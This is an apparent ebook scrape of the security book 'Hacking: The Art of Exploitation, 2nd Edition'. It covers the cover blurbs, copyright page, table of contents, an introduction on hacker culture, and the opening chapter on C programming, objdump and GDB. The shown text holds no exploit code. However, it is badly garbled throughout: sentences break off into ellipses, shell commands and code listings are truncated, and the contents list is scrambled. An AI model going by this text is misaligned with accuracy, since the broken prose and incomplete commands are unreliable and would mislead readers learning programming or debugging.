Title: Hacking The Art of Exploitation
Description: If you are starting to learn hacking, this ebook might be helpful.


International Best-Seller!

The fundamental techniques of serious hacking:

- Program computers using C, assembly language, and shell scripts
- Corrupt system memory to run arbitrary code using buffer overflows and format strings
- Crack encrypted wireless traffic using the FMS attack, and speed up brute-force attacks using a password probability matrix

Hackers are always pushing the boundaries, investigating the unknown, and evolving their art
...
Combine this knowledge with
the included Linux environment, and all you need is
your own creativity
...
He speaks at computer security conferences and trains security
teams around the world
...

- Inspect processor registers and system memory with a debugger to gain a real understanding of what is happening

LiveCD provides a complete Linux programming and debugging environment

THE FINEST IN GEEK ENTERTAINMENT™

w w w
...
com

“I LAY FLAT
...

Printed on recycled paper

2nd Edition

- Redirect network traffic, conceal open ports, and hijack TCP connections

$49
...
95 cdn)
shelve in : computer security/network security

the art of exploitation

The included LiveCD provides a complete Linux
programming and debugging environment—all
without modifying your current operating system
...
Get your hands dirty
debugging code, overflowing buffers, hijacking
network communications, bypassing protections,
exploiting cryptographic weaknesses, and perhaps
even inventing new exploits
...
To share the art
and science of hacking in a way that is accessible
to everyone, Hacking: The Art of Exploitation, 2nd
Edition introduces the fundamentals of C programming from a hacker’s perspective
...
Many people call themselves
hackers, but few have the strong technical foundation needed to really push the envelope
...
Finally a book that does not
just show how to use the exploits but how to develop them
...
”
—SECURITY FORUMS
“I recommend this book for the programming section alone
...
It is written by someone who knows of what
he speaks, with usable code, tools and examples
...
”
—COMPUTER POWER USER (CPU) MAGAZINE
“This is an excellent book
...
”
—ABOUT
...
Copyright © 2008 by Jon Erickson
...
No part of this work may be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior
written permission of the copyright owner and the publisher
...
directly:
No Starch Press, Inc
...
863
...
863
...
com; www
...
com
Library of Congress Cataloging-in-Publication Data
Erickson, Jon, 1977-
Hacking : the art of exploitation / Jon Erickson
...

p
...

ISBN-13: 978-1-59327-144-2
ISBN-10: 1-59327-144-1
1
...
2
...
3
...

QA76
...
A25E75 2008
005
...
Title
...
Other product and
company names mentioned herein may be the trademarks of their respective owners
...

The information in this book is distributed on an “As Is” basis, without warranty
...
shall have any liability to any
person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the
information contained in it
...
xi
Acknowledgments
...
1

0x200

Programming
...
115

0x400

Networking
...
281

0x600

Countermeasures
...
393

0x800

Conclusion
...
455

CONTENTS IN DETAIL
PREFACE

xi

ACKNOWLEDGMENTS

xii

0x100

INTRODUCTION

1

0x200

PROGRAMMING

5

0x210
0x220
0x230

0x240

0x250

0x260

0x270

0x280

What Is Programming?
...
7
Control Structures
...
8
0x232 While/Until Loops
...
10
More Fundamental Programming Concepts
...
11
0x242 Arithmetic Operators
...
14
0x244 Functions
...
19
0x251 The Bigger Picture
...
23
0x253 Assembly Language
...
37
0x261 Strings
...
41
0x263 Pointers
...
48
0x265 Typecasting
...
58
0x267 Variable Scoping
...
69
0x271 Memory Segments in C
...
77
0x273 Error-Checked malloc()
...
81
0x281 File Access
...
87
0x283 User IDs
...
96
0x285 Function Pointers
...
101
0x287 A Game of Chance
...
118
Buffer Overflows
...
122
Experimenting with BASH
...
142
Overflows in Other Segments
...
150
0x342 Overflowing Function Pointers
...
167
0x351 Format Parameters
...
170
0x353 Reading from Arbitrary Memory Addresses
...
173
0x355 Direct Parameter Access
...
182
0x357 Detours with
...
184
0x358 Another notesearch Vulnerability
...
190

0x400
0x410
0x420

EXPLOITATION

NETWORKING

195

OSI Model
...
198
0x421 Socket Functions
...
200
0x423 Network Byte Order
...
203
0x425 A Simple Server Example
...
207
0x427 A Tinyweb Server
...
217
0x431 Data-Link Layer
...
220
0x433 Transport Layer
...
224
0x441 Raw Socket Sniffer
...
228
0x443 Decoding the Layers
...
239
Denial of Service
...
252
0x452 The Ping of Death
...
256
0x454 Ping Flooding
...
257
0x456 Distributed DoS Flooding
...
258
0x461 RST Hijacking
...
263

0x470

0x480

Port Scanning
...
264
0x472 FIN, X-mas, and Null Scans
...
265
0x474 Idle Scanning
...
267
Reach Out and Hack Someone
...
273
0x482 Almost Only Counts with Hand Grenades
...
278

0x500
0x510
0x520

0x530

0x540

0x550

0x630
0x640
0x650

0x660

0x670
0x680

0x690

281

Assembly vs
...
282
0x511 Linux System Calls in Assembly
...
286
0x521 Assembly Instructions Using the Stack
...
289
0x523 Removing Null Bytes
...
295
0x531 A Matter of Privilege
...
302
Port-Binding Shellcode
...
307
0x542 Branching Control Structures
...
314

0x600
0x610
0x620

SHELLCODE

COUNTERMEASURES

319

Countermeasures That Detect
...
321
0x621 Crash Course in Signals
...
324
Tools of the Trade
...
329
Log Files
...
334
Overlooking the Obvious
...
336
0x652 Putting Things Back Together Again
...
346
Advanced Camouflage
...
348
0x662 Logless Exploitation
...
354
0x671 Socket Reuse
...
359
0x681 String Encoding
...
362
Buffer Restrictions
...
366

0x6a0
0x6b0

0x6c0

Hardening Countermeasures
...
376
0x6b1 ret2libc
...
377
Randomized Stack Space
...
380
0x6c2 Bouncing Off linux-gate
...
388
0x6c4 A First Attempt
...
390

0x700
0x710

0x720
0x730
0x740

0x750

0x760

0x770

0x780

CONCLUSION

451

References
...
454

INDEX

x

393

Information Theory
...
394
0x712 One-Time Pads
...
395
0x714 Computational Security
...
397
0x721 Asymptotic Notation
...
398
0x731 Lov Grover’s Quantum Search Algorithm
...
400
0x741 RSA
...
404
Hybrid Ciphers
...
406
0x752 Differing SSH Protocol Host Fingerprints
...
413
Password Cracking
...
419
0x762 Exhaustive Brute-Force Attacks
...
423
0x764 Password Probability Matrix
...
11b Encryption
...
434
0x772 RC4 Stream Cipher
...
436
0x781 Offline Brute-Force Attacks
...
437
0x783 IV-Based Decryption Dictionary Tables
...
438
0x785 Fluhrer, Mantin, and Shamir Attack
...
Understanding hacking techniques
is often difficult, since it requires both breadth and
depth of knowledge
...
This
second edition of Hacking: The Art of Exploitation makes the world of hacking
more accessible by providing the complete picture—from programming to
machine code to exploitation
...
This CD
contains all the source code in the book and provides a development and
exploitation environment you can use to follow along with the book’s
examples and experiment along the way
...
Also, I would like to thank my friends Seth Benson and Aaron Adams
for proofreading and editing, Jack Matheson for helping me with assembly,
Dr
...

0x100
INTRODUCTION

The idea of hacking may conjure stylized images of
electronic vandalism, espionage, dyed hair, and body
piercings
...
Granted, there are people out
there who use hacking techniques to break the law, but hacking isn’t really
about that
...

The essence of hacking is finding unintended or overlooked uses for the
laws and properties of a given situation and then applying them in new and
inventive ways to solve a problem—whatever it may be
...
Each number must be
used once and only once, and you may define the order of
operations; for example, 3 * (4 + 6) + 1 = 31 is valid, however
incorrect, since it doesn’t total 24
...
Like the solution to this problem (shown on the last page of
this book), hacked solutions follow the rules of the system, but they use those
rules in counterintuitive ways
...

Since the infancy of computers, hackers have been creatively solving
problems
...
The club’s members used this
equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing in to the appropriate sections
...
The group moved on
to programming on punch cards and ticker tape for early computers like the
IBM 704 and the TX-0
...
A new program that could achieve the same result
as an existing one but used fewer punch cards was considered better, even
though it did the same thing
...

Being able to reduce the number of punch cards needed for a program
showed an artistic mastery over the computer
...
Early hackers proved that technical problems can have artistic solutions, and they thereby transformed programming from a mere engineering
task into an art form
...
The few
who got it formed an informal subculture that remained intensely focused
on learning and mastering their art
...
Such obstructions included authority figures, the bureaucracy of
college classes, and discrimination
...
This drive to continually learn and explore transcended
even the conventional boundaries drawn by discrimination, evident in the
MIT model railroad club’s acceptance of 12-year-old Peter Deutsch when
he demonstrated his knowledge of the TX-0 and his desire to learn
...

The original hackers found splendor and elegance in the conventionally
dry sciences of math and electronics
...
Their desire
to dissect and understand wasn’t intended to demystify artistic endeavors; it
was simply a way to achieve a greater appreciation of them
...
This is not a new cultural trend; the
Pythagoreans in ancient Greece had a similar ethic and subculture, despite
not owning computers
...
That thirst for knowledge and its beneficial byproducts would continue on through history, from the Pythagoreans to Ada
Lovelace to Alan Turing to the hackers of the MIT model railroad club
...

How does one distinguish between the good hackers who bring us the
wonders of technological advancement and the evil hackers who steal our
credit card numbers? The term cracker was coined to distinguish evil hackers
from the good ones
...
Hackers stayed true to the
Hacker Ethic, while crackers were only interested in breaking the law and
making a quick buck
...
Cracker was meant to be the
catch-all label for anyone doing anything unscrupulous with a computer—
pirating software, defacing websites, and worst of all, not understanding what
they were doing
...

The term’s lack of popularity might be due to its confusing etymology—
cracker originally described those who crack software copyrights and reverse
engineer copy-protection schemes
...

Few technology journalists feel compelled to use terms that most of their
readers are unfamiliar with
...
Similarly, the term script kiddie is sometimes used
to refer to crackers, but it just doesn’t have the same zing as the shadowy
hacker
...

The current laws restricting cryptography and cryptographic research
further blur the line between hackers and crackers
...

This paper responded to a challenge issued by the Secure Digital Music
Initiative (SDMI) in the SDMI Public Challenge, which encouraged the
public to attempt to break these watermarking schemes
...

The Digital Millennium Copyright Act (DMCA) of 1998 makes it illegal to
discuss or provide technology that might be used to bypass industry consumer controls
...
He had written software to circumvent
overly simplistic encryption in Adobe software and presented his findings at a
hacker convention in the United States
...
Under the law, the complexity of the
industry consumer controls doesn’t matter—it would be technically illegal to
reverse engineer or even discuss Pig Latin if it were used as an industry consumer control
...

The sciences of nuclear physics and biochemistry can be used to kill,
yet they also provide us with significant scientific advancement and modern
medicine
...
Even if we wanted to, we couldn’t suppress
the knowledge of how to convert matter into energy or stop the continued
technological progress of society
...
Hackers will
constantly be pushing the limits of knowledge and acceptable behavior,
forcing us to explore further and further
...
Just as the speedy gazelle adapted from being chased by the cheetah,
and the cheetah became even faster from chasing the gazelle, the competition between hackers provides computer users with better and stronger
security, as well as more complex and sophisticated attack techniques
...
The defending hackers create IDSs
to add to their arsenal, while the attacking hackers develop IDS-evasion
techniques, which are eventually compensated for in bigger and better IDS
products
...

The intent of this book is to teach you about the true spirit of hacking
...
Included with this book is
a bootable LiveCD containing all the source code used herein as well as a
preconfigured Linux environment
...
The only requirement is an x86 processor, which is used by all
Microsoft Windows machines and the newer Macintosh computers—just
insert the CD and reboot
...

This way, you will gain a hands-on understanding and appreciation for hacking
that may inspire you to improve upon existing techniques or even to invent
new ones
...

0x200
PROGRAMMING

Hacker is a term for both those who write code and
those who exploit it
...
Since an understanding
of programming helps those who exploit, and an understanding of exploitation helps those who program, many
hackers do both
...

Hacking is really just the act of finding a clever and counterintuitive
solution to a problem
...
Programming hacks are
similar in that they also use the rules of the computer in new and inventive
ways, but the final goal is efficiency or smaller source code, not necessarily a
security compromise
...
The few solutions that remain
are small, efficient, and neat
...
Hackers on both sides of programming
appreciate both the beauty of elegant code and the ingenuity of clever hacks
...
Because of the
tremendous exponential growth of computational power and memory,
spending an extra five hours to create a slightly faster and more memory-efficient piece of code just doesn’t make business sense when dealing with
modern computers that have gigahertz of processing cycles and gigabytes of
memory
...
When the
bottom line is money, spending time on clever hacks for optimization just
doesn’t make sense
...
These are the people who get
excited about programming and really appreciate the beauty of an elegant
piece of code or the ingenuity of a clever hack
...

0x210

What Is Programming?
Programming is a very natural and intuitive concept
...
Programs are
everywhere, and even the technophobes of the world use programs every day
...
A typical program for driving directions might look something
like this:
Start out down Main Street headed east
...
If the street is blocked because of construction, turn
right there at 15th Street, turn left on Pine Street, and then turn right on
16th Street
...

Continue on 16th Street, and turn left onto Destination Road
...

The address is 743 Destination Road
...
Granted, they’re not eloquent,
but each instruction is clear and easy to understand, at least for someone
who reads English
...
To instruct a computer to do something, the instructions
must be written in its language
...
To write a program in machine language for an
Intel x86 processor, you would have to figure out the value associated with
each instruction, how each instruction interacts, and myriad low-level details
...

What’s needed to overcome the complication of writing machine language
is a translator
...

Assembly language is less cryptic than machine language, since it uses names
for the different instructions and variables, instead of just using numbers
...
The instruction names
are very esoteric, and the language is architecture specific
...
Any program written using assembly language for one processor’s
architecture will not work on another processor’s architecture
...
In addition, in order to write an effective program in assembly
language, you must still know many low-level details of the processor architecture you are writing for
...
A compiler converts a high-level language into machine language
...
This means that if a program is written in a high-level language, the program only needs to be written once; the same piece of
program code can be compiled into machine language for various specific
architectures
...

A program written in a high-level language is much more readable and
English-like than assembly language or machine language, but it still must
follow very strict rules about how the instructions are worded, or the compiler won’t be able to understand it
...
Pseudo-code is simply English arranged with a general structure
similar to a high-level language
...
Pseudo-code isn’t well defined; in fact, most people write pseudo-code
slightly differently
...
Pseudo-code makes for an excellent introduction to common universal programming concepts
...
This is fine for very simple programs, but most
programs, like the driving directions example, aren’t that simple
...
These
statements are known as control structures, and they change the flow of the
program’s execution from a simple sequential order to a more complex and
more useful flow
...

If it is, a special set of instructions needs to address that situation
...
These types of special cases
can be accounted for in a program with one of the most natural control
structures: the if-then-else structure
...
The if-then-else pseudo-code structure of the preceding driving directions might look something like this:
Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
{
  Turn right on 16th Street;
}

Each instruction is on its own line, and the various sets of conditional
instructions are grouped between curly braces and indented for readability
...

Of course, other languages require the then keyword in their syntax—
BASIC, Fortran, and even Pascal, for example
...
Once a programmer understands the concepts
these languages are trying to convey, learning the various syntactical variations is fairly trivial
...

Another common rule of C-like syntax is when a set of instructions
bounded by curly braces consists of just one instruction, the curly braces are
optional
...
The driving directions from
before can be rewritten following this rule to produce an equivalent piece of
pseudo-code:
Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;

This rule about sets of instructions holds true for all of the control
structures mentioned in this book, and the rule itself can be described in
pseudo-code
...
There are variations of if-then-else, such as select/case statements,
but the logic is still basically the same: If this happens do these things, otherwise
do these other things (which could consist of even more if-then statements)
...
A programmer will often want to execute a set of
instructions more than once
...
A while loop says to execute the following set of
instructions in a loop while a condition is true
...
The amount of food the mouse finds each
time could range from a tiny crumb to an entire loaf of bread
...

Another variation on the while loop is an until loop, a syntax that is
available in the programming language Perl (C doesn’t use this syntax)
...
The
same mouse program using an until loop would be:
Until (you are not hungry)
{
  Find some food;
  Eat the food;
}

Logically, any until-like statement can be converted into a while loop
...
This can easily be changed into a
standard while loop by simply inverting the condition
...
This is generally used when
a programmer wants to loop for a certain number of iterations
...
The same statement can be written as such:
Set the counter to 0;
While (the counter is less than 5)
{
  Drive straight for 1 mile;
  Add 1 to the counter;
}

The C-like pseudo-code syntax of a for loop makes this even more
apparent:
For (i=0; i<5; i++)
  Drive straight for 1 mile;

In this case, the counter is called i, and the for statement is broken up
into three sections, separated by semicolons
...
The second section is like
a while statement using the counter: While the counter meets this condition,
keep looping
...
In this case, i++ is a shorthand
way of saying, Add 1 to the counter called i
...
These concepts are used in many programming languages, with
a few syntactical differences
...
By the end, the pseudo-code should look very similar to C code
...
A variable can
simply be thought of as an object that holds data that can be changed—
hence the name
...
Returning to the driving example, the speed of the car would
be a variable, while the color of the car would be a constant
...
This is because a C program will eventually be compiled into an executable program
...
Ultimately, all variables
are stored in memory somewhere, and their declarations allow the compiler
to organize this memory more efficiently
...

In C, each variable is given a type that describes the information that is
meant to be stored in that variable
...
Variables are declared simply by using these keywords before
listing the variables, as you can see below
...
14), and z is expected to hold a character value, like A
or w
...

int a = 13, b;
float k;
char z = 'A';
k = 3
...
14, z will contain the character w,
and b will contain the value 18, since 13 plus 5 equals 18
...

0x242

Arithmetic Operators

The statement b = a + 5 is an example of a very simple arithmetic operator
...

The first four operations should look familiar
...
If a is 13, then 13 divided by 5 equals 2, with a remainder of 3, which
means that a % 5 = 3
...
Floating-point variables must be used to retain the
more correct answer of 2
...

Operation          Symbol   Example
Addition           +        b = a + 5
Subtraction        -        b = a - 5
Multiplication     *        b = a * 5
Division           /        b = a / 5
Modulo reduction   %        b = a % 5

To get a program to use these concepts, you must speak its language
...
One of these was mentioned earlier and is used commonly in for loops
...

i = i - 1    i-- or --i    Subtract 1 from the variable
...
This is where the difference between i++ and ++i becomes apparent
...
The following example will help clarify
...

Quite often in programs, variables need to be modified in place
...
This
happens commonly enough that shorthand also exists for it
...

i = i - 12    i-=12    Subtract some value from the variable
...

i = i / 12    i/=12    Divide the variable by some value
...
These conditional statements are based on some
sort of comparison
...

Condition                  Symbol   Example
Less than                  <        (a < b)
Greater than               >        (a > b)
Less than or equal to      <=       (a <= b)
Greater than or equal to   >=       (a >= b)
Equal to                   ==       (a == b)
Not equal to               !=       (a != b)

Most of these operators are self-explanatory; however, notice that the
shorthand for equal to uses double equal signs
...
The statement a = 7 means
Put the value 7 in the variable a, while a == 7 means Check to see whether the variable
a is equal to 7
...
) Also, notice that an
exclamation point generally means not
...

!(a < b)    is equivalent to    (a >= b)

These comparison operators can also be chained together using shorthand for OR and AND
...
Similarly,
the example statement consisting of two smaller comparisons joined with
AND logic will fire true if a is less than b AND a is not less than c
...

Many things can be boiled down to variables, comparison operators, and
control structures
...
Naturally, 1
means true and 0 means false
...
In C, comparison results are ordinary integers rather than a separate Boolean type, so any nonzero value is
considered true, and a condition is considered false if it evaluates to 0
...
Checking to see whether the variable hungry
is equal to 1 will return 1 if hungry equals 1 and 0 if hungry equals 0
...

While (hungry)
{
  Find some food;
  Eat the food;
}

A smarter mouse program with more inputs demonstrates how comparison operators can be combined with variables
...

Just remember that any nonzero value is considered true, and the value of 0
is considered false
...
These instructions can be grouped into a smaller subprogram called a function
...
For example, the action of turning a car actually
consists of many smaller instructions: Turn on the appropriate blinker, slow
down, check for oncoming traffic, turn the steering wheel in the appropriate
direction, and so on
...
You can pass variables as arguments
to a function in order to modify the way the function operates
...

Function Turn(variable_direction)
{
  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel back to the original position;
  Turn off the variable_direction blinker;
}

This function describes all the instructions needed to make a turn
...
When the function is called, the instructions found within it are
executed with the arguments passed to it; afterward, execution returns to
where it was in the program, after the function call
...

By default in C, functions can return a value to a caller
...
Imagine a
function that calculates the factorial of a number—naturally, it returns the
result
...
This format
looks very similar to variable declaration
...
The return statement
at the end of the function passes back the contents of the variable x and ends
the function
...

int a=5, b;
b = factorial(a);

At the end of this short program, the variable b will contain 120, since
the factorial function will be called with the argument of 5 and will return 120
...
This can be done by simply writing the entire function before using it
later in the program or by using function prototypes
...
The actual
function can be located near the end of the program, but it can be used anywhere else, since the compiler already knows about it
...

There’s no need to actually define any variable names in the prototype, since
this is done in the actual function
...

If a function doesn’t have any value to return, it should be declared as void,
as is the case with the turn() function I used as an example earlier
...
Every turn in the directions has both a direction and a street
name
...
This complicates the function
of turning, since the proper street must be located before the turn can be
made
...

void turn(variable_direction, target_street_name)
{
  Look for a street sign;
  current_intersection_name = read street sign name;
  while(current_intersection_name != target_street_name)
  {
    Look for another street sign;
    current_intersection_name = read street sign name;
  }
  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel right back to the original position;
  Turn off the variable_direction blinker;
}

This function includes a section that searches for the proper intersection
by looking for street signs, reading the name on each street sign, and storing
that name in a variable called current_intersection_name
...
The pseudo-code driving
instructions can now be changed to use this turning function
...
Since pseudo-code doesn’t actually have to work,
full functions don’t need to be written out—simply jotting down Do some
complex stuff here will suffice
...
Most of the real usefulness of C comes from collections of
existing functions called libraries
...
C compilers exist for just about every operating system and processor
architecture out there, but for this book, Linux and an x86-based processor
will be used exclusively
...
Since hacking is really about experimenting, it’s
probably best if you have a C compiler to follow along with
...
Just put the CD in the drive and reboot
your computer
...
From this Linux environment you can follow
along with the book and experiment on your own
...
The firstprog
...

firstprog
...
h>
int main()
{
  int i;
  for(i=0; i < 10; i++)       // Loop 10 times
  {
    puts("Hello, world!\n");
  }
  return 0;                   // Tell OS the program exited without errors
}
...
Any text following two forward slashes (//) is a comment, which is
ignored by the compiler
...
This header file is added to the program when it is compiled
...
h, and it defines several constants and function prototypes for corresponding functions in the standard I/O library
...

This function prototype (along with many others) is included in the stdio
...
A lot of the power of C comes from its extensibility and libraries
...
You may have even noticed that there’s a set of curly braces that
can be eliminated
...

The GNU Compiler Collection (GCC) is a free C compiler that translates C
into machine language that a processor can understand
...
out by default
...
c
ls -l a
...
out

...
out

The Bigger Picture

Okay, this has all been stuff you would learn in an elementary programming
class—basic, but essential
...
Don’t get me wrong, being fluent in C is very useful
and is enough to make you a decent programmer, but it’s only a piece of the
bigger picture
...
Hackers get their edge from knowing how all
the pieces interact within this bigger picture
...

The code can’t actually do anything until it’s compiled into an executable
binary file
...
The binary a
...
Compilers are designed to translate the language of C code into machine
language for a variety of processor architectures
...
There are also Sparc processor
architectures (used in Sun Workstations) and the PowerPC processor architecture (used in pre-Intel Macs)
...

As long as the compiled program works, the average programmer is
only concerned with source code
...
With a better
understanding of how the CPU operates, a hacker can manipulate the programs that run on it
...
But what does
this executable binary look like? The GNU development tools include a program called objdump, which can be used to examine compiled binaries
...

reader@hacking:~/booksrc $ objdump -D a ... :
08048374 <main>:
 8048374:       55                      push   %ebp
 8048375:       89 e5                   mov    %esp,%ebp
 8048377:       83 ec 08                sub    $0x8,%esp
 804837a:       83 e4 f0                and    $0xfffffff0,%esp
 804837d:       b8 00 00 00 00          mov    $0x0,%eax
 8048382:       29 c4                   sub    %eax,%esp
 8048384:       c7 45 fc 00 00 00 00    movl   $0x0,0xfffffffc(%ebp)
 804838b:       83 7d fc 09             cmpl   $0x9,0xfffffffc(%ebp)
 804838f:       7e 02                   jle    8048393
 8048391:       eb 13                   jmp    80483a6
 8048393:       c7 04 24 84 84 04 08    movl   $0x8048484,(%esp)
 804839a:       e8 01 ff ff ff          call   80482a0
 804839f:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 80483a2:       ff 00                   incl   (%eax)
 80483a4:       eb e5                   jmp    804838b
 80483a6:       c9                      leave
 80483a7:       c3                      ret
 80483a8:       90                      nop
 80483a9:       90                      nop
 80483aa:       90                      nop
reader@hacking:~/booksrc $

The objdump program will spit out far too many lines of output to
sensibly examine, so the output is piped into grep with the command-line
option to only display 20 lines after the regular expression main
...
The
numbering system you are most familiar with uses a base-10 system, since at
10 you need to add an extra symbol
...
This is a convenient notation since a byte contains 8 bits, each
of which can be either true or false
...

The hexadecimal numbers—starting with 0x8048374 on the far left—are
memory addresses
...
Memory is just a
collection of bytes of temporary storage space that are numbered with
addresses
...
Each
byte of memory can be accessed by its address, and in this case the CPU
accesses this part of memory to retrieve the machine language instructions
that make up the compiled program
...
The 32-bit processors
have 2^32 (or 4,294,967,296) possible addresses, while the 64-bit ones have 2^64
(1
...
The 64-bit processors can run in
32-bit compatibility mode, which allows them to run 32-bit code quickly
...
Of course, these hexadecimal values
are only representations of the bytes of binary 1s and 0s the CPU can understand
...

isn’t very useful to anything other than the processor, the machine code is
displayed as hexadecimal bytes and each instruction is put on its own line,
like splitting a paragraph into sentences
...
The instructions on
the far right are in assembly language
...

The instruction ret is far easier to remember and make sense of than 0xc3 or
11000011
...
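
To see that 0xc3 and 11000011 really are the same byte, here is a minimal sketch in C. The helper name byte_to_binary is my own invention for illustration; it simply tests each of the 8 bits in turn, starting from the most significant one.

```c
#include <stdio.h>

/* Write the 8 bits of a byte into out, most significant bit first.
   out must have room for 9 chars: 8 digits plus the null terminator.
   (byte_to_binary is a hypothetical helper name, not a library call.) */
void byte_to_binary(unsigned char byte, char out[9])
{
    for (int bit = 0; bit < 8; bit++) {
        /* 0x80 >> bit selects bit 7 first, then 6, and so on down to 0. */
        out[bit] = (byte & (0x80 >> bit)) ? '1' : '0';
    }
    out[8] = '\0';
}

/* Print one byte in hexadecimal, binary, and decimal. */
void print_byte(unsigned char byte)
{
    char bits[9];

    byte_to_binary(byte, bits);
    printf("hex 0x%02x = binary %s = decimal %u\n", byte, bits, byte);
}
```

Calling print_byte(0xc3) from a main() function of your own shows the ret opcode in all three notations.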
This means that since every processor architecture has
different machine language instructions, each also has a different form of
assembly language
...
Exactly how
these machine language instructions are represented is simply a matter of
convention and preference
...
The assembly shown in the earlier objdump output
is in AT&T syntax, since just about all of Linux’s disassembly tools use this syntax by
default
...
The same
code can be shown in Intel syntax by providing an additional command-line
option, -M intel, to objdump, as shown in the output below
...
out | grep -A20 main
...

Regardless of the assembly language representation, the commands a processor understands are quite simple
...
These operations move memory
around, perform some sort of basic math, or interrupt the processor to get it
to do something else
...
But in the same way millions of books have been written using a relatively
small alphabet of letters, an infinite number of possible programs can be
created using a relatively small collection of machine instructions
...
Most
of the instructions use these registers to read or write data, so understanding
the registers of a processor is essential to understanding the instructions
...

0x252 The x86 Processor

The 8086 CPU was the first x86 processor
...
If you remember people talking
about 386 and 486 processors in the ’80s and ’90s, this is what they were
referring to
...
I could just talk abstractly about these registers now, but
I think it’s always better to see things for yourself
...
Debuggers are used by programmers to step through compiled programs, examine program memory, and
view processor registers
...
Similar to a microscope, a debugger allows
a hacker to observe the microscopic world of machine code—but a debugger is
far more powerful than this metaphor allows
...

Programming

Below, GDB is used to show the state of the processor registers right before
the program starts
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $

A breakpoint is set on the main() function so execution will stop right
before our code is executed
...

The first four registers (EAX, ECX, EDX, and EBX) are known as general-purpose registers
...
They are used for a variety of purposes, but they mainly
act as temporary variables for the CPU when it is executing machine
instructions
...

These stand for Stack Pointer, Base Pointer, Source Index, and Destination Index,
respectively
...
These registers
are fairly important to program execution and memory management; we will
discuss them more later
...
There are load and store instructions
that use these registers, but for the most part, these registers can be thought
of as just simple general-purpose registers
...
Like a child pointing his finger
at each word as he reads, the processor reads each instruction using the EIP
register as its finger
...
Currently, it points to a memory address at 0x804838a
...
The actual memory is
split into several different segments, which will be discussed later, and these
registers keep track of that
...

0x253 Assembly Language

Since we are using Intel syntax assembly language for this book, our tools
must be configured to use this syntax
...
You can configure this setting to run every time GDB starts up by
putting the command in the file
...

reader@hacking:~/booksrc $ gdb -q
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc $ echo "set dis intel" > ~/
...
gdbinit
set dis intel
reader@hacking:~/booksrc $

Now that GDB is configured to use Intel syntax, let’s begin understanding
it
...
The operations are usually intuitive mnemonics: The mov
operation will move a value from the source to the destination, sub will
subtract, inc will increment, and so forth
...

8048375:   89 e5       mov    ebp,esp
8048377:   83 ec 08    sub    esp,0x8


There are also operations that are used to control the flow of execution
...
The example below first compares a 4-byte
value located at EBP minus 4 with the number 9
...
If that value is less than or equal to 9, execution jumps to the
instruction at 0x8048393
...
If the value isn’t less than or equal to 9, execution will jump to 0x80483a6
...
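
The compare-then-jump pattern can be mimicked in C with goto, which might make the flow easier to follow. This is only a sketch: the function name and the labels compare, body, and done are made up for illustration, and a counter stands in for the real loop body.

```c
#include <stdio.h>

/* Walk through a loop using the same compare-and-jump shape as the
   machine instructions: compare a value with 9, jump into the body if it
   is less than or equal to 9, otherwise jump past the end.
   Labels and names here are illustrative only. */
int count_iterations(void)
{
    int i = 0;        /* the 4-byte value being compared */
    int count = 0;    /* stand-in for whatever the loop body does */

compare:
    if (i <= 9)       /* cmp with 9, then jle to the body */
        goto body;
    goto done;        /* otherwise an unconditional jmp to the end */

body:
    count++;          /* the loop body */
    i++;              /* increment the value */
    goto compare;     /* jmp back to the comparison */

done:
    return count;
}
```

The body runs once for each value from 0 through 9, so count_iterations() returns 10.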

The -g flag can be used by the GCC compiler to include extra debugging
information, which will give GDB access to the source code
...
c
reader@hacking:~/booksrc $ ls -l a
...
out
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/libthread_db
...
1"
...
h>
2
3       int main()
4       {
5         int i;
6         for(i=0; i < 10; i++)
7         {
8           printf("Hello, world!\n");
9         }
10      }
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384:     push   ebp
0x08048385:     mov    ebp,esp
0x08048387:     sub    esp,0x8
0x0804838a:     and    esp,0xfffffff0
0x0804838d:     mov    eax,0x0
0x08048392:     sub    esp,eax
0x08048394:     mov    DWORD PTR [ebp-4],0x0
0x0804839b:     cmp    DWORD PTR [ebp-4],0x9
0x0804839f:     jle    0x80483a3
0x080483a1:     jmp    0x80483b6
0x080483a3:     mov    DWORD PTR [esp],0x80484d4
0x080483aa:     call   0x80482a8 <_init+56>
0x080483af:     lea    eax,[ebp-4]
0x080483b2:     inc    DWORD PTR [eax]
0x080483b4:     jmp    0x804839b
0x080483b6:     leave
0x080483b7:     ret
End of assembler dump
...
c, line 6
...
out
Breakpoint 1, main() at firstprog
...
Then a breakpoint is set at the start of main(), and the program is
run
...
Since the breakpoint has been set at the
start of the main() function, the program hits the breakpoint and pauses
before actually executing any instructions in main()
...

Notice that EIP contains a memory address that points to an instruction in
the main() function’s disassembly (shown in bold)
...
Part of the reason variables need to be declared in C is to aid
the construction of this section of code
...
We’ll talk
more about the function prologue later, but for now we can take a cue from
GDB and skip it
...
Examining memory is a critical
skill for any hacker
...
In both magic and hacking, if you were to look in just the right
spot, the trick would be obvious
...
But with a debugger like GDB, every aspect
of a program’s execution can be deterministically examined, paused, stepped
through, and repeated as often as needed
...

The examine command in GDB can be used to look at a certain address
of memory in a variety of ways
...


The display format also uses a single-letter shorthand, which is optionally
preceded by a count of how many items to examine
...

x    Display in hexadecimal
...

t    Display in binary
...
In the following example, the current address of the EIP
register is used
...

(gdb) i r eip
eip            0x8048384        0x8048384
(gdb) x/o 0x8048384
0x8048384:      077042707
